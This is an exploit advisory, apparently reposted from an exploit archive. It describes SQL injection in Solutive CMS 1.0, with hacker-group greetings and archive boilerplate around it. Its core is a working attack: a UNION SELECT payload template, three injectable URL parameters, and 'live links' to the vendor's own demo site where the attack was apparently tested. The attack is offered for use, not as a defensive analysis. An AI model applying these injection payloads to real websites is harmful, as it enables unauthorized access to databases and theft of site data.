Solutive CMS version 1.0 suffers from a remote SQL injection vulnerability.
c948a676b62ae63fb8f9bdaabef9a76484e171775fbd46016f4c21c01d957ec8
# Exploit Title: Solutive CMS SQL Injection Vulnerability
# Date: 4-04-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
th3rdx@gmail.com
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Solutive CMS SQL Injection Vulnerability
----- [ Vendor ] -----
http://www.solutive.net/
%\\
##############################################################################
##############################################################################
%//
----- [ Exploit (s) ] -----
Put [CODE] = SQL Injection Code
{e.g = product_detail.php?id=7+and+1=0+ Union Select 1 ,2,
UNHEX(HEX([visible]))
,4,5,6 (tables & column) }
[SQLi] http://server/cms/product_detail.php?id=7[CODE]
[SQLi] http://server/cms/news_content.php?id=9[CODE]
[SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE]
%\\
##############################################################################
##############################################################################
%//
>>>>>> TESTED ON <<<<<<
----- [ Live Link (s) ] -----
[Link] http://solutive.net/cms01/product_detail.php?id=7[CODE]
[Link] http://solutive.net/cms01/news_content.php?id=9[CODE]
[Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE]
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 04 April 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed